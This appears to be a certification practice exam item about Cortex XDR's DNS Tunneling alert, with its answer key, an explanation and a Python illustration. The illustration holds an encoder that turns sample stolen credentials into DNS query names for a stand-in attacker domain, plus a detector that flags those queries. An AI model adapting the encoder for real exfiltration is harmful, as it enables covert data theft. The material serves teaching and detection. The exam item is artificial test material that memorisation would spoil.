Palo Alto Networks System Engineer – Cortex — Question 43
An adversary attempts to communicate with malware running on a network in order to control malware activities or to exfiltrate data from the network.
Which Cortex XDR Analytics alert will this activity most likely trigger?
Answer options
- A. uncommon local scheduled task creation
- B. malware
- C. new administrative behavior
- D. DNS Tunneling
Correct answer: D
Explanation
The correct answer is D, DNS Tunneling. The scenario describes command-and-control (C2) traffic and data exfiltration: the adversary is talking to malware that is already running inside the network. DNS tunneling is a common covert channel for exactly that. DNS is almost always allowed outbound, so the malware can encode commands and stolen data in the subdomain labels of queries for an attacker-controlled domain, and the attacker's authoritative server can send instructions back in the answers (for example in TXT records), without any direct connection to the attacker's host. Cortex XDR Analytics flags this kind of anomalous DNS query behaviour from an endpoint, such as an unusually high volume of queries for unique, long subdomains of a single domain, as a DNS Tunneling alert.

Options A, B and C are less likely to be triggered because none of them concerns the communication channel. Uncommon local scheduled task creation (A) is a persistence indicator on a host. Malware (B) is a verdict on the malicious file or process itself, not on its network traffic. New administrative behavior (C) flags a user or host that starts performing administrative actions it has not performed before.
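To make the reasoning concrete, the following added example (not Cortex XDR code, and not the page's own) shows both halves of the picture: a tunnelling client that encodes a stolen payload into DNS query names, and a toy detector that runs over constructed DNS log lines and flags the pattern a DNS Tunneling analytic looks for (many queries, almost every name unique, long subdomain prefixes, high character entropy). The log format, the hosts, the `evil-tunnel.test` domain, the payload and every threshold are assumptions chosen for illustration; Cortex XDR's real detection logic is not described on this page.

```python
"""Toy DNS-tunnelling encoder and detector over constructed DNS log lines.

Added illustration, not Cortex XDR code. Thresholds and log format are assumed.
"""
from __future__ import annotations

import base64
import math
from collections import defaultdict

# --- Constructed sample data ------------------------------------------------
# Assumed log line format: "<timestamp> <src_ip> <query_name> <qtype>"
BENIGN_LINES = [
    "2024-03-01T10:00:01Z 10.0.0.5 www.example.com A",
    "2024-03-01T10:00:02Z 10.0.0.5 mail.example.com A",
    "2024-03-01T10:00:05Z 10.0.0.5 www.example.com A",
    "2024-03-01T10:00:09Z 10.0.0.5 cdn.example.com A",
    "2024-03-01T10:00:12Z 10.0.0.5 api.example.com A",
    "2024-03-01T10:00:15Z 10.0.0.5 www.example.com A",
]

# The data the "malware" leaks and the attacker-controlled name: both constructed.
EXFIL_PAYLOAD = b"user=jdoe;pass=Winter2024!;host=fin-ws01;token=7f3a9c0e"
C2_DOMAIN = "c2.evil-tunnel.test"


def make_tunnel_queries(payload: bytes, src_ip: str, domain: str, chunk: int = 16) -> list[str]:
    """Encode the payload as DNS-safe base32 and emit one query name per chunk.

    A sequence number label keeps every name unique so no resolver cache answers it
    and every query reaches the attacker's authoritative server.
    """
    data = base64.b32encode(payload).decode().rstrip("=").lower()
    chunks = [data[i:i + chunk] for i in range(0, len(data), chunk)]
    return [
        f"2024-03-01T10:01:{i:02d}Z {src_ip} {i}.{c}.{domain} TXT"
        for i, c in enumerate(chunks)
    ]


TUNNEL_LINES = make_tunnel_queries(EXFIL_PAYLOAD, "10.0.0.7", C2_DOMAIN)


# --- Detection --------------------------------------------------------------
def registered_domain(qname: str) -> str:
    """Naive: the last two labels. Production code should use the Public Suffix List."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def shannon_entropy(text: str) -> float:
    """Bits per character of the string (0 for empty input)."""
    if not text:
        return 0.0
    counts: dict[str, int] = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line: str) -> dict:
    ts, src, qname, qtype = line.split()
    return {"ts": ts, "src": src, "qname": qname.lower().rstrip("."), "qtype": qtype}


def score_dns(lines, min_queries=5, min_unique_ratio=0.8,
              min_avg_prefix_len=15, min_entropy=3.0) -> list[dict]:
    """Return one finding per (source host, registered domain) pair that looks like tunnelling."""
    groups: dict[tuple[str, str], list[str]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        domain = registered_domain(rec["qname"])
        # Everything left of the registered domain is under the attacker's control.
        prefix = rec["qname"][: -len(domain)].rstrip(".")
        groups[(rec["src"], domain)].append(prefix)

    findings = []
    for (src, domain), prefixes in groups.items():
        n = len(prefixes)
        unique_ratio = len(set(prefixes)) / n
        avg_len = sum(len(p) for p in prefixes) / n
        entropy = shannon_entropy("".join(prefixes).replace(".", ""))
        # All four features must exceed their (assumed) thresholds to reduce false positives.
        if (n >= min_queries and unique_ratio >= min_unique_ratio
                and avg_len >= min_avg_prefix_len and entropy >= min_entropy):
            findings.append({"src": src, "domain": domain, "queries": n,
                             "unique_ratio": round(unique_ratio, 2),
                             "avg_prefix_len": round(avg_len, 1),
                             "entropy": round(entropy, 2)})
    return findings


if __name__ == "__main__":
    for finding in score_dns(BENIGN_LINES + TUNNEL_LINES):
        print(f"DNS tunnelling suspected: {finding}")
```

Run as-is, the benign host 10.0.0.5 is not reported (its names repeat and the prefixes are three or four characters long), while 10.0.0.7 is reported for `evil-tunnel.test` with six unique, long, high-entropy query names. The point of the combined rule is the same one behind the alert: a single scheduled task or a file verdict says nothing about this traffic, but the shape of the DNS queries does.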